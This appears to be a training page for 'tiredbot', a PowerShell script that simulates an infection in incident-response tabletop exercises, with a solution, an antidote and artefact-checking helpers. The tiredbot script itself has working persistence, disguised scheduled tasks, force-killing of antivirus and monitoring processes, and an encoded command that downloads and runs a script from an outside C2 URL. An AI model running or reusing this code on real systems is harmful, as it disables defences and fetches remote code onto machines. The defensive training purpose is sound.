Tiredbot is designed to be used for tabletop exercises. The program is not malicious, but it does perform malicious-looking behaviour. Tiredbot copies itself to 5 temporary locations, sets up 2 other persistence mechanisms and respawns every 37 minutes. Responders therefore have 37 minutes to remediate all of tiredbot's artefacts before the infected PC gets *tired*, reboots and is reinfected on start-up.

Tabletop Exercise (TTX)

The TTX controller should run tiredbot.ps1 on a virtual machine, then close the program.
The CIRT should then access the VM, investigate, and attempt to contain the infection on the VM.

Objective
  1. Identify the 5 tiredbot clones
  2. Identify the 2 persistence mechanisms used by tiredbot
  3. Decode the base64-encoded command
  4. Identify the C2 URL
  5. Write a script to remediate the infection

#tiredbot.ps1#

#Add_to_Start_up
# Logged-on user. Win32_ComputerSystem.UserName is "DOMAIN\name", so keep only the name part
$user = ((Get-WmiObject -Class Win32_ComputerSystem).UserName -split '\\')[-1]
try {
    # Clone the script into four locations (Start-up folder, the user's AppData, C:\temp, C:\)
    Copy-Item "./tiredbot.ps1" -Destination "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
    Copy-Item "./tiredbot.ps1" -Destination "C:\Users\$user\AppData\Local\Microsoft"
    Copy-Item "./tiredbot.ps1" -Destination "C:\temp"
    Copy-Item "./tiredbot.ps1" -Destination "C:\"
}
catch { "An error occurred." }

#Create_SchTask
try {
    # All four registrations use the same task name, so only the first creates a task;
    # the later ones fail because "scvhost" already exists.
    $action = New-ScheduledTaskAction -Execute 'Powershell.exe' `
        -Argument '-verb runas -ArgumentList "-file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\tiredbot.ps1"'
    $trigger = New-ScheduledTaskTrigger -Daily -At 9am
    Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "scvhost" -Description "scvhost daily scheduled task"

    $action = New-ScheduledTaskAction -Execute 'Powershell.exe' `
        -Argument '-verb runas -ArgumentList "-file C:\Users\$user\AppData\Local\Microsoft\tiredbot.ps1"'
    $trigger = New-ScheduledTaskTrigger -Daily -At 9am
    Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "scvhost" -Description "scvhost daily scheduled task"

    $action = New-ScheduledTaskAction -Execute 'Powershell.exe' `
        -Argument '-verb runas -ArgumentList "-file C:\temp\tiredbot.ps1"'
    $trigger = New-ScheduledTaskTrigger -Daily -At 9am
    Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "scvhost" -Description "scvhost daily scheduled task"

    $action = New-ScheduledTaskAction -Execute 'Powershell.exe' `
        -Argument '-verb runas -ArgumentList "-file C:\tiredbot.ps1"'
    $trigger = New-ScheduledTaskTrigger -Daily -At 9am
    Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "scvhost" -Description "scvhost daily scheduled task"
}
catch { "An error occurred." }

#Encoded_Command
powershell.exe -EncodedCommand "JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBhAGwAdwBhAHkAcwAtAHQAaQAuAHIAZQBkAC8AdABpAHIAZQBkAGIAbwB0AGMAMgAuAHAAcwAxACIADQAKACQAZABlAHMAdAAgAD0AIAAiAGMAOgBcAHQAZQBtAHAAXAB3AGkAbgBkAG8AdwBzAFwAcwBwAGEAdwBuAF8AdABpAHIAZQBkAGIAbwB0AF8AZgByAG8AbQBfAGMAMgAuAHAAcwAxACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABkAGUAcwB0AA0ACgBjAGQAIABjADoAXAB0AGUAbQBwAFwAdwBpAG4AZABvAHcAcwBcAA0ACgAuAFwAcwBwAGEAdwBuAF8AdABpAHIAZQBkAGIAbwB0AF8AZgByAG8AbQBfAGMAMgAuAHAAcwAxAA=="

#Add_Run_Key
# The registry provider path is HKCU:\, not the Computer\HKEY_CURRENT_USER\ path shown by regedit
New-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name tired -Force
Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\tired -Value "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\tiredbot.ps1"

#Disable_AV
try {
taskkill /f /im sysmon64.exe
taskkill /f /im confer.exe
taskkill /f /im masvc.exe
taskkill /f /im SemSvc.exe
taskkill /f /im NortonSecurity.exe
taskkill /f /im MgntSvc.exe
taskkill /f /im bdagent.exe
taskkill /f /im Mbam.exe
}
catch { "An error occurred." }

#Timer_Countdown_37_minutes
Start-Sleep -Seconds 2220

Write-Host "**YAAWWWWWWWNNN** I'm Tired! Gooodnight..."
Write-Host "**YAAWWWWWWWNNN** I'm Tired! Gooodnight..."
for ($i = 1; $i -le 10; $i++) {
    Write-Host "zzZZZzzzZZZZzzzzz"
}

Start-Sleep -Seconds 5
Stop-Computer -ComputerName localhost
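Objectives 3 and 4 can be worked through without executing the payload. The following is an added example, not part of tiredbot or the antidote: it decodes the string passed to -EncodedCommand above (base64 over UTF-16LE, which is what powershell.exe expects for that switch) and lists any URLs found in the result. The function names ConvertFrom-EncodedCommand and Get-UrlsFromScript are my own.

```powershell
# Added example (not part of tiredbot or the antidote): decode a
# "powershell.exe -EncodedCommand" payload and pull out any URLs so the
# C2 can be identified without running the command.
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Encoded)
    # -EncodedCommand is base64 over UTF-16LE, not UTF-8. Line breaks and
    # spaces picked up when the string was copied out of the script must be
    # removed first, otherwise FromBase64String throws on the padding.
    $clean = $Encoded -replace '\s', ''
    $bytes = [Convert]::FromBase64String($clean)
    [System.Text.Encoding]::Unicode.GetString($bytes)
}

function Get-UrlsFromScript {
    param([Parameter(Mandatory)][string]$Script)
    # Match http(s):// up to the next quote, angle bracket or whitespace.
    [regex]::Matches($Script, 'https?://[^\s"''<>]+') |
        ForEach-Object { $_.Value } |
        Sort-Object -Unique
}

# The payload copied from tiredbot.ps1 above, as it appears on the page
# (wrapped over three lines; the whitespace is stripped before decoding).
$encoded = @'
JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBhAGwAdwBhAHkAcwAtAHQAaQAuAHIAZQBkAC8AdABpAHIAZQBkAGIAbwB0AGMAMgAuAHAAcwAxACIADQAKACQAZABlAHMAdAAgAD0AIAAiAGMAOgBcAHQAZQBtAHAAXAB3AGkAbgBkAG8AdwBzAFwAcwBwAGEAdwBuAF
8AdABpAHIAZQBkAGIAbwB0AF8AZgByAG8AbQBfAGMAMgAuAHAAcwAxACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABkAGUAcwB0AA0ACgBjAGQAIABjADoAXAB0AGUAbQBw
AFwAdwBpAG4AZABvAHcAcwBcAA0ACgAuAFwAcwBwAGEAdwBuAF8AdABpAHIAZQBkAGIAbwB0AF8AZgByAG8AbQBfAGMAMgAuAHAAcwAxAA==
'@

$decoded = ConvertFrom-EncodedCommand -Encoded $encoded
Write-Host "Decoded command:`n$decoded"
Write-Host "URLs found:"
Get-UrlsFromScript -Script $decoded
```

The decoded text also names the file the download is written to and the directory it is run from, which is how the fifth location in the solution below is found. Decoding in a variable rather than piping into Invoke-Expression keeps the analysis passive.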

Solution

  1. Remove the scvhost scheduled task
  2. Remove the HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tired registry key
  3. Remove the tiredbot.ps1 clones from:
    "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
    "C:\Users\$user\AppData\Local\Microsoft"
    "C:\temp\windows" (spawn_tiredbot_from_c2.ps1, dropped by the encoded command)
    "C:\temp"
    "C:\"

If any one of these clones is left on the VM when Tired reboots it, the asset will be reinfected with all of the artefacts.

#Tiredbot Antidote#

#Remove_SchTask
Unregister-ScheduledTask -TaskName "scvhost" -Confirm:$false

#Remove_RegKey
Remove-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\tired -Force -Verbose

#Remove_Clones
# $user is not set by anything else in this script, so resolve it here before building the AppData path
$user = $env:USERNAME
# Paths containing spaces must be quoted, or Remove-Item sees them as several arguments
Remove-Item -Path "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\tiredbot.ps1" -Force
Remove-Item -Path "C:\Users\$user\AppData\Local\Microsoft\tiredbot.ps1" -Force
Remove-Item -Path C:\temp\windows\spawn_tiredbot_from_c2.ps1 -Force
Remove-Item -Path C:\temp\tiredbot.ps1 -Force
Remove-Item -Path C:\tiredbot.ps1 -Force
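Before the 37-minute timer runs out, responders need to know whether anything was missed. The following is an added example, not part of tiredbot or the antidote script above: it checks every artefact listed in the solution and reports what is still present. The function name Test-TiredbotArtefacts is my own, and the running-process check assumes tiredbot.ps1 was launched by its file name, so that the name appears on the PowerShell process command line.

```powershell
# Added example (not part of tiredbot or the antidote): check the VM for
# every tiredbot artefact listed in the Solution and report what is still
# present. Run it after the antidote to confirm the box is clean before the
# 37-minute countdown reboots the host.
function Test-TiredbotArtefacts {
    param(
        # The user tiredbot copied itself for; defaults to the current user.
        [string]$User = $env:USERNAME
    )
    $findings = @()

    # Persistence 1: the "scvhost" scheduled task.
    $task = Get-ScheduledTask -TaskName 'scvhost' -ErrorAction SilentlyContinue
    if ($task) {
        $findings += [pscustomobject]@{ Type = 'ScheduledTask'; Location = $task.TaskName }
    }

    # Persistence 2: the "tired" entry under the HKCU Run key. tiredbot creates
    # it as a subkey, so test for the item rather than for a value on Run.
    $runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\tired'
    if (Test-Path $runKey) {
        $findings += [pscustomobject]@{ Type = 'RegistryKey'; Location = $runKey }
    }

    # The four clones plus the script dropped by the encoded download command.
    $clonePaths = @(
        'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\tiredbot.ps1',
        "C:\Users\$User\AppData\Local\Microsoft\tiredbot.ps1",
        'C:\temp\windows\spawn_tiredbot_from_c2.ps1',
        'C:\temp\tiredbot.ps1',
        'C:\tiredbot.ps1'
    )
    foreach ($path in $clonePaths) {
        if (Test-Path -LiteralPath $path) {
            $findings += [pscustomobject]@{ Type = 'File'; Location = $path }
        }
    }

    # A running copy is the countdown that will reboot the host. Assumption:
    # the script was started by file name, so it shows up in the command line.
    $procs = Get-CimInstance Win32_Process -Filter "Name = 'powershell.exe'" |
        Where-Object { $_.CommandLine -match 'tiredbot\.ps1' }
    foreach ($p in $procs) {
        $findings += [pscustomobject]@{ Type = 'Process'; Location = "PID $($p.ProcessId)" }
    }

    return $findings
}

# Usage: wrap in @() so an empty result still has a Count of 0.
$left = @(Test-TiredbotArtefacts)
if ($left.Count -eq 0) {
    Write-Host 'No tiredbot artefacts found.'
} else {
    Write-Host "$($left.Count) artefact(s) still present:"
    $left | Format-Table -AutoSize
}
```

Run it from an elevated prompt, since the scheduled task and the copies under C:\ and C:\ProgramData are not visible or removable to a standard user, and run it once more after the antidote to confirm the list is empty.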